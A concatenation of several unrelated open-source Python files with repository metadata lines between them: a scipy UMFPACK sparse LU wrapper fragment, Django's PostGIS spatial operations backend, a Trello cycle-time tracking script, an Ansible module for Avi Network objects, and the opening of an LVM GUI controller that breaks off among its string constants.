(status, lnz, unz, n_row, n_col, nz_udiag)\
= self.funs.get_lunz( self._numeric )
if status != UMFPACK_OK:
raise RuntimeError, '%s failed with %s' % (self.funs.get_lunz,
umfStatus[status])
#allocate storage for decomposition data
i_type = mtx.indptr.dtype
Lp = np.zeros( (n_row+1,), dtype = i_type )
Lj = np.zeros( (lnz,), dtype = i_type )
Lx = np.zeros( (lnz,), dtype = np.double )
Up = np.zeros( (n_col+1,), dtype = i_type )
Ui = np.zeros( (unz,), dtype = i_type )
Ux = np.zeros( (unz,), dtype = np.double )
P = np.zeros( (n_row,), dtype = i_type )
Q = np.zeros( (n_col,), dtype = i_type )
Dx = np.zeros( (min(n_row,n_col),), dtype = np.double )
Rs = np.zeros( (n_row,), dtype = np.double )
if self.isReal:
(status,do_recip) = self.funs.get_numeric( Lp,Lj,Lx,Up,Ui,Ux,
P,Q,Dx,Rs,
self._numeric )
if status != UMFPACK_OK:
raise RuntimeError, '%s failed with %s'\
% (self.funs.get_numeric, umfStatus[status])
L = sp.csr_matrix((Lx,Lj,Lp),(n_row,min(n_row,n_col)))
U = sp.csc_matrix((Ux,Ui,Up),(min(n_row,n_col),n_col))
R = Rs
return (L,U,P,Q,R,bool(do_recip))
else:
#allocate additional storage for imaginary parts
Lz = np.zeros( (lnz,), dtype = np.double )
Uz = np.zeros( (unz,), dtype = np.double )
Dz = np.zeros( (min(n_row,n_col),), dtype = np.double )
(status,do_recip) = self.funs.get_numeric(Lp,Lj,Lx,Lz,Up,Ui,Ux,Uz,
P,Q,Dx,Dz,Rs,
self._numeric)
if status != UMFPACK_OK:
raise RuntimeError, '%s failed with %s'\
% (self.funs.get_numeric, umfStatus[status])
Lxz = np.zeros( (lnz,), dtype = np.complex128 )
Uxz = np.zeros( (unz,), dtype = np.complex128 )
Dxz = np.zeros( (min(n_row,n_col),), dtype = np.complex128 )
Lxz.real,Lxz.imag = Lx,Lz
Uxz.real,Uxz.imag = Ux,Uz
Dxz.real,Dxz.imag = Dx,Dz
L = sp.csr_matrix((Lxz,Lj,Lp),(n_row,min(n_row,n_col)))
U = sp.csc_matrix((Uxz,Ui,Up),(min(n_row,n_col),n_col))
R = Rs
return (L,U,P,Q,R,bool(do_recip))
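##
# Illustrative sketch, not part of the original module: one-shot solution of
# A x = b with the double precision/int index ('di') family.  The small
# matrix and right hand side are examples only.
def _example_umfpack_linsolve():
    A = sp.csc_matrix( np.array( [[4.0, 1.0], [1.0, 3.0]] ) )
    b = np.array( [1.0, 2.0] )
    umfpack = UmfpackContext( 'di' )
    # linsolve() computes (and afterwards frees) the numeric object itself.
    return umfpack.linsolve( UMFPACK_A, A, b )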
| bsd-3-clause | -3,374,012,773,880,658,400 | 31.827247 | 88 | 0.53027 | false |
jhg/django | django/contrib/gis/db/backends/postgis/operations.py | 7 | 15047 | import re
from django.conf import settings
from django.contrib.gis.db.backends.base.operations import \
BaseSpatialOperations
from django.contrib.gis.db.backends.postgis.adapter import PostGISAdapter
from django.contrib.gis.db.backends.utils import SpatialOperator
from django.contrib.gis.geometry.backend import Geometry
from django.contrib.gis.measure import Distance
from django.core.exceptions import ImproperlyConfigured
from django.db.backends.postgresql_psycopg2.operations import \
DatabaseOperations
from django.db.utils import ProgrammingError
from django.utils.functional import cached_property
from .models import PostGISGeometryColumns, PostGISSpatialRefSys
class PostGISOperator(SpatialOperator):
def __init__(self, geography=False, **kwargs):
# Only a subset of the operators and functions are available
# for the geography type.
self.geography = geography
super(PostGISOperator, self).__init__(**kwargs)
def as_sql(self, connection, lookup, *args):
if lookup.lhs.output_field.geography and not self.geography:
raise ValueError('PostGIS geography does not support the "%s" '
'function/operator.' % (self.func or self.op,))
return super(PostGISOperator, self).as_sql(connection, lookup, *args)
class PostGISDistanceOperator(PostGISOperator):
sql_template = '%(func)s(%(lhs)s, %(rhs)s) %(op)s %%s'
def as_sql(self, connection, lookup, template_params, sql_params):
if not lookup.lhs.output_field.geography and lookup.lhs.output_field.geodetic(connection):
sql_template = self.sql_template
if len(lookup.rhs) == 3 and lookup.rhs[-1] == 'spheroid':
template_params.update({'op': self.op, 'func': 'ST_Distance_Spheroid'})
sql_template = '%(func)s(%(lhs)s, %(rhs)s, %%s) %(op)s %%s'
else:
template_params.update({'op': self.op, 'func': 'ST_Distance_Sphere'})
return sql_template % template_params, sql_params
return super(PostGISDistanceOperator, self).as_sql(connection, lookup, template_params, sql_params)
class PostGISOperations(BaseSpatialOperations, DatabaseOperations):
name = 'postgis'
postgis = True
geography = True
geom_func_prefix = 'ST_'
version_regex = re.compile(r'^(?P<major>\d)\.(?P<minor1>\d)\.(?P<minor2>\d+)')
Adapter = PostGISAdapter
Adaptor = Adapter # Backwards-compatibility alias.
gis_operators = {
'bbcontains': PostGISOperator(op='~'),
'bboverlaps': PostGISOperator(op='&&', geography=True),
'contained': PostGISOperator(op='@'),
'contains': PostGISOperator(func='ST_Contains'),
'overlaps_left': PostGISOperator(op='&<'),
'overlaps_right': PostGISOperator(op='&>'),
'overlaps_below': PostGISOperator(op='&<|'),
'overlaps_above': PostGISOperator(op='|&>'),
'left': PostGISOperator(op='<<'),
'right': PostGISOperator(op='>>'),
'strictly_below': PostGISOperator(op='<<|'),
'stricly_above': PostGISOperator(op='|>>'),
'same_as': PostGISOperator(op='~='),
'exact': PostGISOperator(op='~='), # alias of same_as
'contains_properly': PostGISOperator(func='ST_ContainsProperly'),
'coveredby': PostGISOperator(func='ST_CoveredBy', geography=True),
'covers': PostGISOperator(func='ST_Covers', geography=True),
'crosses': PostGISOperator(func='ST_Crosses'),
'disjoint': PostGISOperator(func='ST_Disjoint'),
'equals': PostGISOperator(func='ST_Equals'),
'intersects': PostGISOperator(func='ST_Intersects', geography=True),
'overlaps': PostGISOperator(func='ST_Overlaps'),
'relate': PostGISOperator(func='ST_Relate'),
'touches': PostGISOperator(func='ST_Touches'),
'within': PostGISOperator(func='ST_Within'),
'dwithin': PostGISOperator(func='ST_DWithin', geography=True),
'distance_gt': PostGISDistanceOperator(func='ST_Distance', op='>', geography=True),
'distance_gte': PostGISDistanceOperator(func='ST_Distance', op='>=', geography=True),
'distance_lt': PostGISDistanceOperator(func='ST_Distance', op='<', geography=True),
'distance_lte': PostGISDistanceOperator(func='ST_Distance', op='<=', geography=True),
}
unsupported_functions = set()
function_names = {
'BoundingCircle': 'ST_MinimumBoundingCircle',
'MemSize': 'ST_Mem_Size',
'NumPoints': 'ST_NPoints',
}
def __init__(self, connection):
super(PostGISOperations, self).__init__(connection)
prefix = self.geom_func_prefix
self.area = prefix + 'Area'
self.bounding_circle = prefix + 'MinimumBoundingCircle'
self.centroid = prefix + 'Centroid'
self.collect = prefix + 'Collect'
self.difference = prefix + 'Difference'
self.distance = prefix + 'Distance'
self.distance_sphere = prefix + 'distance_sphere'
self.distance_spheroid = prefix + 'distance_spheroid'
self.envelope = prefix + 'Envelope'
self.extent = prefix + 'Extent'
self.extent3d = prefix + '3DExtent'
self.force_rhr = prefix + 'ForceRHR'
self.geohash = prefix + 'GeoHash'
self.geojson = prefix + 'AsGeoJson'
self.gml = prefix + 'AsGML'
self.intersection = prefix + 'Intersection'
self.kml = prefix + 'AsKML'
self.length = prefix + 'Length'
self.length3d = prefix + '3DLength'
self.length_spheroid = prefix + 'length_spheroid'
self.makeline = prefix + 'MakeLine'
self.mem_size = prefix + 'mem_size'
self.num_geom = prefix + 'NumGeometries'
self.num_points = prefix + 'npoints'
self.perimeter = prefix + 'Perimeter'
self.perimeter3d = prefix + '3DPerimeter'
self.point_on_surface = prefix + 'PointOnSurface'
self.polygonize = prefix + 'Polygonize'
self.reverse = prefix + 'Reverse'
self.scale = prefix + 'Scale'
self.snap_to_grid = prefix + 'SnapToGrid'
self.svg = prefix + 'AsSVG'
self.sym_difference = prefix + 'SymDifference'
self.transform = prefix + 'Transform'
self.translate = prefix + 'Translate'
self.union = prefix + 'Union'
self.unionagg = prefix + 'Union'
@cached_property
def spatial_version(self):
"""Determine the version of the PostGIS library."""
# Trying to get the PostGIS version because the function
# signatures will depend on the version used. The cost
# here is a database query to determine the version, which
# can be mitigated by setting `POSTGIS_VERSION` with a 3-tuple
# comprising user-supplied values for the major, minor, and
# subminor revision of PostGIS.
if hasattr(settings, 'POSTGIS_VERSION'):
version = settings.POSTGIS_VERSION
else:
# Run a basic query to check the status of the connection so we're
# sure we only raise the error below if the problem comes from
# PostGIS and not from PostgreSQL itself (see #24862).
self._get_postgis_func('version')
try:
vtup = self.postgis_version_tuple()
except ProgrammingError:
raise ImproperlyConfigured(
'Cannot determine PostGIS version for database "%s" '
'using command "SELECT postgis_lib_version()". '
'GeoDjango requires at least PostGIS version 2.0. '
'Was the database created from a spatial database '
'template?' % self.connection.settings_dict['NAME']
)
version = vtup[1:]
return version
def convert_extent(self, box, srid):
"""
Returns a 4-tuple extent for the `Extent` aggregate by converting
the bounding box text returned by PostGIS (`box` argument), for
example: "BOX(-90.0 30.0, -85.0 40.0)".
"""
if box is None:
return None
ll, ur = box[4:-1].split(',')
xmin, ymin = map(float, ll.split())
xmax, ymax = map(float, ur.split())
return (xmin, ymin, xmax, ymax)
def convert_extent3d(self, box3d, srid):
"""
Returns a 6-tuple extent for the `Extent3D` aggregate by converting
the 3d bounding-box text returned by PostGIS (`box3d` argument), for
example: "BOX3D(-90.0 30.0 1, -85.0 40.0 2)".
"""
if box3d is None:
return None
ll, ur = box3d[6:-1].split(',')
xmin, ymin, zmin = map(float, ll.split())
xmax, ymax, zmax = map(float, ur.split())
return (xmin, ymin, zmin, xmax, ymax, zmax)
def convert_geom(self, hex, geo_field):
"""
        Converts the geometry returned from PostGIS aggregates.
"""
if hex:
return Geometry(hex, srid=geo_field.srid)
else:
return None
def geo_db_type(self, f):
"""
Return the database field type for the given geometry field.
Typically this is `None` because geometry columns are added via
the `AddGeometryColumn` stored procedure, unless the field
has been specified to be of geography type instead.
"""
if f.geography:
if f.srid != 4326:
raise NotImplementedError('PostGIS only supports geography columns with an SRID of 4326.')
return 'geography(%s,%d)' % (f.geom_type, f.srid)
else:
# Type-based geometries.
# TODO: Support 'M' extension.
if f.dim == 3:
geom_type = f.geom_type + 'Z'
else:
geom_type = f.geom_type
return 'geometry(%s,%d)' % (geom_type, f.srid)
def get_distance(self, f, dist_val, lookup_type):
"""
Retrieve the distance parameters for the given geometry field,
distance lookup value, and the distance lookup type.
This is the most complex implementation of the spatial backends due to
what is supported on geodetic geometry columns vs. what's available on
projected geometry columns. In addition, it has to take into account
the geography column type.
"""
# Getting the distance parameter and any options.
if len(dist_val) == 1:
value, option = dist_val[0], None
else:
value, option = dist_val
# Shorthand boolean flags.
geodetic = f.geodetic(self.connection)
geography = f.geography
if isinstance(value, Distance):
if geography:
dist_param = value.m
elif geodetic:
if lookup_type == 'dwithin':
raise ValueError('Only numeric values of degree units are '
'allowed on geographic DWithin queries.')
dist_param = value.m
else:
dist_param = getattr(value, Distance.unit_attname(f.units_name(self.connection)))
else:
# Assuming the distance is in the units of the field.
dist_param = value
if (not geography and geodetic and lookup_type != 'dwithin'
and option == 'spheroid'):
# using distance_spheroid requires the spheroid of the field as
# a parameter.
return [f._spheroid, dist_param]
else:
return [dist_param]
def get_geom_placeholder(self, f, value, compiler):
"""
Provides a proper substitution value for Geometries that are not in the
SRID of the field. Specifically, this routine will substitute in the
ST_Transform() function call.
"""
if value is None or value.srid == f.srid:
placeholder = '%s'
else:
# Adding Transform() to the SQL placeholder.
placeholder = '%s(%%s, %s)' % (self.transform, f.srid)
if hasattr(value, 'as_sql'):
# If this is an F expression, then we don't really want
# a placeholder and instead substitute in the column
# of the expression.
sql, _ = compiler.compile(value)
placeholder = placeholder % sql
return placeholder
def _get_postgis_func(self, func):
"""
Helper routine for calling PostGIS functions and returning their result.
"""
# Close out the connection. See #9437.
with self.connection.temporary_connection() as cursor:
cursor.execute('SELECT %s()' % func)
return cursor.fetchone()[0]
def postgis_geos_version(self):
"Returns the version of the GEOS library used with PostGIS."
return self._get_postgis_func('postgis_geos_version')
def postgis_lib_version(self):
"Returns the version number of the PostGIS library used with PostgreSQL."
return self._get_postgis_func('postgis_lib_version')
def postgis_proj_version(self):
"Returns the version of the PROJ.4 library used with PostGIS."
return self._get_postgis_func('postgis_proj_version')
def postgis_version(self):
"Returns PostGIS version number and compile-time options."
return self._get_postgis_func('postgis_version')
def postgis_full_version(self):
"Returns PostGIS version number and compile-time options."
return self._get_postgis_func('postgis_full_version')
def postgis_version_tuple(self):
"""
Returns the PostGIS version as a tuple (version string, major,
minor, subminor).
"""
# Getting the PostGIS version
version = self.postgis_lib_version()
m = self.version_regex.match(version)
if m:
major = int(m.group('major'))
minor1 = int(m.group('minor1'))
minor2 = int(m.group('minor2'))
else:
raise Exception('Could not parse PostGIS version string: %s' % version)
return (version, major, minor1, minor2)
def proj_version_tuple(self):
"""
Return the version of PROJ.4 used by PostGIS as a tuple of the
major, minor, and subminor release numbers.
"""
proj_regex = re.compile(r'(\d+)\.(\d+)\.(\d+)')
proj_ver_str = self.postgis_proj_version()
m = proj_regex.search(proj_ver_str)
if m:
return tuple(map(int, [m.group(1), m.group(2), m.group(3)]))
else:
raise Exception('Could not determine PROJ.4 version from PostGIS.')
def spatial_aggregate_name(self, agg_name):
if agg_name == 'Extent3D':
return self.extent3d
else:
return self.geom_func_prefix + agg_name
# Routines for getting the OGC-compliant models.
def geometry_columns(self):
return PostGISGeometryColumns
def spatial_ref_sys(self):
return PostGISSpatialRefSys
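# Illustrative sketch, not part of the original backend: how the bounding box
# text handled by PostGISOperations.convert_extent() maps onto a 4-tuple.  The
# box string below is the example quoted in that method's docstring.
def _example_convert_extent(box="BOX(-90.0 30.0, -85.0 40.0)"):
    ll, ur = box[4:-1].split(',')
    xmin, ymin = map(float, ll.split())
    xmax, ymax = map(float, ur.split())
    return (xmin, ymin, xmax, ymax)  # -> (-90.0, 30.0, -85.0, 40.0)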
| bsd-3-clause | 904,794,644,061,299,300 | 40.68144 | 107 | 0.608095 | false |
freyley/trello-traceability | cmds.py | 1 | 10762 | #!/usr/bin/env python
import pickle
import sys
from datetime import timedelta, datetime
import dateutil.parser
import pytz
import models, trellointerface
def make_db():
models.main()
def fill_db():
trellointerface.main()
def test_conn():
import settings
from trello import TrelloClient
trelloclient = TrelloClient(
api_key=settings.TRELLO_API_KEY,
api_secret=settings.TRELLO_API_SECRET,
token=settings.TRELLO_OAUTH_TOKEN,
)
try:
organization = trelloclient.get_organization(settings.TRELLO_ORGANIZATION_ID)
except Exception, e:
print "Connection broken: {}".format(str(e))
sys.exit()
print "Connection OK"
return organization
def find_boards():
organization = test_conn()
for board in organization.get_boards('open'):
print "{} ({})".format(board.name, board.id)
def _check_item(action_list, key, value, startswith):
return action_list[key] == value or (startswith and action_list[key].startswith(value))
def _identify_list_from_identifiers(action_list, identify_mechanisms):
for key, value in identify_mechanisms.items():
startswith = False
if '__startswith' in key:
key = key.split('__')[0]
startswith = True
if isinstance(value, list) or isinstance(value, tuple):
for item in value:
if _check_item(action_list, key, item, startswith):
return True
else:
if _check_item(action_list, key, value, startswith):
return True
return False
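def _example_identify_settings():
    # Illustrative sketch, not part of the original tool: the IDENTIFY_*
    # values in settings are dicts keyed by Trello list fields; a
    # '__startswith' suffix switches equality to prefix matching and a
    # list/tuple value means "match any of these".  The values below are
    # examples only -- the real ones live in settings.py.
    identify_done = {'name__startswith': ('Done', 'Released')}
    action_list = {'name': 'Done 2015-06-01'}
    return _identify_list_from_identifiers(action_list, identify_done)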
def _going_to_a_done_list(action):
import settings
action_list = action['data']['listAfter']
return _identify_list_from_identifiers(action_list, settings.IDENTIFY_DONE_LIST)
def _going_to_a_started_list(action):
import settings
action_list = action['data']['listAfter']
return _identify_list_from_identifiers(action_list, settings.IDENTIFY_STARTING_LIST)
def _leaving_doing_for_committed(action):
import settings
before_list = action['data']['listBefore']
is_currently_doing = _identify_list_from_identifiers(before_list, settings.IDENTIFY_CURRENTLY_DOING_LIST)
after_list = action['data']['listAfter']
going_to_done = _identify_list_from_identifiers(after_list, settings.IDENTIFY_ANY_DONE_LIST)
return bool(is_currently_doing and going_to_done)
def _parse_date_or_ipdb(datey):
try:
return dateutil.parser.parse(datey)
except Exception, e:
import ipdb; ipdb.set_trace()
def close_complete():
import settings
from trello import TrelloClient
trelloclient = TrelloClient(
api_key=settings.TRELLO_API_KEY,
api_secret=settings.TRELLO_API_SECRET,
token=settings.TRELLO_OAUTH_TOKEN,
)
import os.path
PROJECT_DIR = os.path.dirname(__file__)
MOST_RECENT_DATE_FILENAME = os.path.join(PROJECT_DIR, 'most_recent_date')
try:
most_recent_date = pickle.load(open(MOST_RECENT_DATE_FILENAME))
except IOError:
utc = pytz.timezone("UTC")
most_recent_date = datetime.now(utc) - timedelta(100)
new_newest_date = most_recent_date
for board_id in [settings.CURRENT_STORY_BOARD] + settings.FUTURE_STORY_BOARD:
board = trelloclient.get_board(board_id)
board.fetch_actions('updateCheckItemStateOnCard')
actions = board.actions
for action in actions:
action_date = dateutil.parser.parse(action['date'])
if action_date > new_newest_date:
new_newest_date = action_date
if action_date <= most_recent_date:
break
if action['data']['checklist']['name'] == 'Meta':
item_name = action['data']['checkItem']['name']
if item_name.startswith('Epic Connection'):
epic_connection = action['data']['checkItem']['name']
epic_card_id = epic_connection.split(':')[1].strip()
card_id = action['data']['card']['id']
card_name = action['data']['card']['name']
epic = trelloclient.get_card(epic_card_id)
epic.fetch(eager=True)
for checklist in epic.checklists:
if checklist.name == 'Stories':
for item in checklist.items:
if item['name'].startswith(card_id):
print "Completing {} on epic {}".format(card_name, epic.name)
checklist.set_checklist_item(item['name'], checked=True)
pickle.dump(new_newest_date, open(MOST_RECENT_DATE_FILENAME, 'wb+'))
def find_cycle_times():
import settings
from trello import TrelloClient
trelloclient = TrelloClient(
api_key=settings.TRELLO_API_KEY,
api_secret=settings.TRELLO_API_SECRET,
token=settings.TRELLO_OAUTH_TOKEN,
)
CYCLE_TIME_IDENTIFIER = 'Cycle time:::'
FINISHED_IDENTIFIER = 'Finished:::'
STARTED_IDENTIFIER = 'Started:::'
ENGINEERING_IDENTIFIER = "Committed:::"
cycle_time_file = open(settings.CYCLE_TIMES_CSV_LOCATION, 'a')
board = trelloclient.get_board(settings.CURRENT_STORY_BOARD)
board.fetch_actions("updateCard:idList")
actions = board.actions
for action in actions:
action_date = dateutil.parser.parse(action['date'])
if _going_to_a_started_list(action):
card = trelloclient.get_card(action['data']['card']['id'])
card.fetch(eager=True)
for checklist in card.checklists:
if checklist.name == 'Meta':
checklist.found_started = False
for item in checklist.items:
if item['name'].startswith(STARTED_IDENTIFIER):
checklist.found_started = True
if not checklist.found_started:
checklist.add_checklist_item('{} {}'.format(STARTED_IDENTIFIER, action['date']))
print "Found started time for card {}".format(card.name)
elif _leaving_doing_for_committed(action):
card = trelloclient.get_card(action['data']['card']['id'])
card.fetch(eager=True)
for checklist in card.checklists:
if checklist.name == 'Meta':
checklist.found_engineering = False
for item in checklist.items:
if item['name'].startswith(ENGINEERING_IDENTIFIER):
checklist.found_engineering = True
if not checklist.found_engineering:
checklist.add_checklist_item('{} {}'.format(ENGINEERING_IDENTIFIER, action['date']))
print "Found engineering time for card {}".format(card.name)
elif _going_to_a_done_list(action):
card = trelloclient.get_card(action['data']['card']['id'])
card.fetch(eager=True)
for checklist in card.checklists:
if checklist.name == 'Meta':
checklist.found_done = False
checklist.started_time = checklist.finished_time = checklist.engineering_time = checklist.cycle_time = None
for item in checklist.items:
if item['name'].startswith(FINISHED_IDENTIFIER):
checklist.found_done = True
checklist.finished_time = _parse_date_or_ipdb(item['name'].split(FINISHED_IDENTIFIER)[1])
if item['name'].startswith(STARTED_IDENTIFIER):
checklist.started_time = _parse_date_or_ipdb(item['name'].split(STARTED_IDENTIFIER)[1])
if item['name'].startswith(ENGINEERING_IDENTIFIER):
checklist.engineering_time = _parse_date_or_ipdb((item['name'].split(ENGINEERING_IDENTIFIER)[1]))
if item['name'].startswith(CYCLE_TIME_IDENTIFIER):
checklist.cycle_time = float(item['name'].split(CYCLE_TIME_IDENTIFIER)[1])
if not checklist.found_done:
checklist.add_checklist_item('{} {}'.format(FINISHED_IDENTIFIER, action['date']))
print "Found finished time for card {}".format(card.name)
if checklist.started_time and checklist.finished_time:
engineering_time = ""
if checklist.engineering_time:
engineering_time = (action_date - checklist.engineering_time).total_seconds() / (60 * 60)
cycle_time = (action_date - checklist.started_time).total_seconds() / (60*60)
cycle_time_string = '{} {}'.format(CYCLE_TIME_IDENTIFIER, cycle_time)
if checklist.cycle_time is None:
checklist.add_checklist_item(cycle_time_string)
cycle_time_file.write('"{card.name}",{card.id},"{card.url}",{engineering_time},{cycle_time}\n'.format(
card=card, cycle_time=cycle_time, engineering_time=engineering_time))
print "Found cycle time for {}: {}".format(card.name, cycle_time_string)
def find_unconnected():
import settings
db_session = models.get_session()()
current_board_id = settings.CURRENT_STORY_BOARD
unconnected_cards = db_session.query(models.Card, models.TrelloList).filter(models.Card.trellolist_id==models.TrelloList.id).filter(models.Card.connected_to_id == None).filter(
models.TrelloList.board_id == current_board_id)
for card, tlist in unconnected_cards:
print "found disconnected card", card.name
def next_release():
import settings
from trello import TrelloClient
trelloclient = TrelloClient(
api_key=settings.TRELLO_API_KEY,
api_secret=settings.TRELLO_API_SECRET,
token=settings.TRELLO_OAUTH_TOKEN,
)
board = trelloclient.get_board(settings.CURRENT_STORY_BOARD)
for trellolist in board.get_lists('open'):
action_list = {'name': trellolist.name }
if _identify_list_from_identifiers(action_list, settings.IDENTIFY_DONE_LIST):
for card in trellolist.list_cards():
print card.name
cmds = {
'makedb': make_db,
'filldb': fill_db,
'test_conn': test_conn,
'find_boards': find_boards,
'complete': close_complete,
'cycletimes': find_cycle_times,
'unconnected': find_unconnected,
'next_release': next_release,
}
if len(sys.argv) < 2:
print "Available commands: {}".format(", ".join(cmds.keys()))
sys.exit()
cmds[sys.argv[1]]()
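# Example invocations (the names come from the cmds table above), assuming
# the script is run directly:
#   python cmds.py cycletimes
#   python cmds.py unconnected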
| agpl-3.0 | -5,345,407,224,313,717,000 | 43.655602 | 180 | 0.597194 | false |
maartenq/ansible | lib/ansible/modules/network/avi/avi_network.py | 20 | 4997 | #!/usr/bin/python
#
# @author: Gaurav Rastogi ([email protected])
# Eric Anderson ([email protected])
# module_check: supported
# Avi Version: 17.1.1
#
# Copyright: (c) 2017 Gaurav Rastogi, <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_network
author: Gaurav Rastogi ([email protected])
short_description: Module for setup of Network Avi RESTful Object
description:
- This module is used to configure Network object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.4"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent", "present"]
avi_api_update_method:
description:
- Default method for object update is HTTP PUT.
- Setting to patch will override that behavior to use HTTP PATCH.
version_added: "2.5"
default: put
choices: ["put", "patch"]
avi_api_patch_op:
description:
- Patch operation to use when using avi_api_update_method as patch.
version_added: "2.5"
choices: ["add", "replace", "delete"]
cloud_ref:
description:
- It is a reference to an object of type cloud.
configured_subnets:
description:
- List of subnet.
dhcp_enabled:
description:
- Select the ip address management scheme for this network.
- Default value when not specified in API or module is interpreted by Avi Controller as True.
type: bool
exclude_discovered_subnets:
description:
- When selected, excludes all discovered subnets in this network from consideration for virtual service placement.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
name:
description:
- Name of the object.
required: true
synced_from_se:
description:
- Boolean flag to set synced_from_se.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
tenant_ref:
description:
- It is a reference to an object of type tenant.
url:
description:
- Avi controller URL of the object.
uuid:
description:
- Unique object identifier of the object.
vcenter_dvs:
description:
- Boolean flag to set vcenter_dvs.
- Default value when not specified in API or module is interpreted by Avi Controller as True.
type: bool
vimgrnw_ref:
description:
- It is a reference to an object of type vimgrnwruntime.
vrf_context_ref:
description:
- It is a reference to an object of type vrfcontext.
extends_documentation_fragment:
- avi
'''
EXAMPLES = """
- name: Example to create Network object
avi_network:
controller: 10.10.25.42
username: admin
password: something
state: present
name: sample_network
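# A sketch only, not from the module author: the same object can later be
# removed by switching state to absent.
- name: Example to delete Network object
  avi_network:
    controller: 10.10.25.42
    username: admin
    password: something
    state: absent
    name: sample_network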
"""
RETURN = '''
obj:
description: Network (api/network) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.network.avi.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
avi_api_update_method=dict(default='put',
choices=['put', 'patch']),
avi_api_patch_op=dict(choices=['add', 'replace', 'delete']),
cloud_ref=dict(type='str',),
configured_subnets=dict(type='list',),
dhcp_enabled=dict(type='bool',),
exclude_discovered_subnets=dict(type='bool',),
name=dict(type='str', required=True),
synced_from_se=dict(type='bool',),
tenant_ref=dict(type='str',),
url=dict(type='str',),
uuid=dict(type='str',),
vcenter_dvs=dict(type='bool',),
vimgrnw_ref=dict(type='str',),
vrf_context_ref=dict(type='str',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
return avi_ansible_api(module, 'network',
set([]))
if __name__ == '__main__':
main()
| gpl-3.0 | -350,158,778,468,453,000 | 32.092715 | 126 | 0.611767 | false |
andyvand/cygsystem-config-llvm | src/InputController.py | 1 | 100355 | """This class represents the primary controller interface
for the LVM UI application.
"""
import sys
import string
import os
import re
import stat
import os.path
import gobject
from lvm_model import lvm_model
from CommandHandler import CommandHandler
from lvmui_constants import *
from CommandError import CommandError
import Fstab
import Filesystem
from Segment import STRIPED_SEGMENT_ID
from ExtentBlock import ExtentBlock
from WaitMsg import WaitMsg
import PhysicalVolume
from execute import execWithCapture, execWithCaptureErrorStatus, execWithCaptureStatus
from utilities import follow_links_to_target
import gettext
_ = gettext.gettext
### gettext first, then import gtk (exception prints gettext "_") ###
try:
import gtk
import gtk.glade
except RuntimeError, e:
print _("""
Unable to initialize graphical environment. Most likely cause of failure
is that the tool was not run using a graphical environment. Please either
start your graphical user interface or set your DISPLAY variable.
Caught exception: %s
""") % e
sys.exit(-1)
import gnome
import gnome.ui
SIZE_COL = TYPE_COL
VOL_TYPE_COL = 3
UNALLOC_VOL = 0
UNINIT_VOL = 1
###TRANSLATOR: The string below is seen when adding a new Physical
###Volume to an existing Volume Group.
ADD_PV_TO_VG_LABEL=_("Select a Volume Group to add %s to:")
MEGA_MULTIPLIER = 1000000.0
GIGA_MULTIPLIER = 1000000000.0
KILO_MULTIPLIER = 1000.0
DEFAULT_STRIPE_SIZE_IDX = 4
MAX_PHYSICAL_VOLS = 256
MAX_LOGICAL_VOLS = 256
DEFAULT_EXTENT_SIZE = 4
DEFAULT_EXTENT_SIZE_MEG_IDX = 1
DEFAULT_EXTENT_SIZE_KILO_IDX = 2
NO_FILESYSTEM_FS = 0
ACCEPTABLE_STRIPE_SIZES = [4,8,16,32,64,128,256,512]
ACCEPTABLE_EXTENT_SIZES = ["2","4","8","16","32","64","128","256","512","1024"]
###TRANSLATOR: The two strings below refer to the name and type of
###available disk entities on the system. There are two types --
###The first is an 'unallocated physical volume' which is a disk or
###partition that has been initialized for use with LVM, by writing
###a special label onto the first block of the partition. The other type
###is an 'uninitialized entity', which is an available disk or partition
###that is NOT yet initialized to be used with LVM. Hope this helps give
###some context.
ENTITY_NAME=_("Name")
ENTITY_SIZE=_("Size")
ENTITY_TYPE=_("Entity Type")
UNALLOCATED_PV=_("Unallocated Physical Volume")
UNINIT_DE=_("Uninitialized Disk Entity")
ADD_VG_LABEL=_("Select disk entities to add to the %s Volume Group:")
CANT_STRIPE_MESSAGE=_("A Volume Group must be made up of two or more Physical Volumes to support striping. This Volume Group does not meet that requirement.")
NON_UNIQUE_NAME=_("A Logical Volume with the name %s already exists in this Volume Group. Please choose a unique name.")
NON_UNIQUE_VG_NAME=_("A Volume Group with the name %s already exists. Please choose a unique name.")
MUST_PROVIDE_NAME=_("A Name must be provided for the new Logical Volume")
MUST_PROVIDE_VG_NAME=_("A Name must be provided for the new Volume Group")
BAD_MNT_POINT=_("The specified mount point, %s, does not exist. Do you wish to create it?")
BAD_MNT_CREATION=_("The creation of mount point %s unexpectedly failed.")
NOT_IMPLEMENTED=_("This capability is not yet implemented in this version")
EXCEEDED_MAX_LVS=_("The number of Logical Volumes in this Volume Group has reached its maximum limit.")
EXCEEDED_MAX_PVS=_("The number of Physical Volumes in this Volume Group has reached its maximum limit.")
EXCEEDING_MAX_PVS=_("At most %s Physical Volumes can be added to this Volume Group before the limit is reached.")
NOT_ENOUGH_SPACE_FOR_NEW_LV=_("Volume Group %s does not have enough space for new Logical Volumes. A possible solution would be to add an additional Physical Volume to the Volume Group.")
ALREADY_A_SNAPSHOT=_("A snapshot of a snapshot is not supported.")
CANNOT_SNAPSHOT_A_MIRROR=_("A snapshot of a mirrored Logical Volume is not supported.")
CANNOT_REMOVE_UNDER_SNAPSHOT=_("Logical volume %s has snapshot %s currently associated with it. Please remove the snapshot first.")
CANNOT_REMOVE_UNDER_SNAPSHOTS=_("Logical volume %s has snapshots: %s currently associated with it. Please remove snapshots first.")
TYPE_CONVERSION_ERROR=_("Undefined type conversion error in model factory. Unable to complete task.")
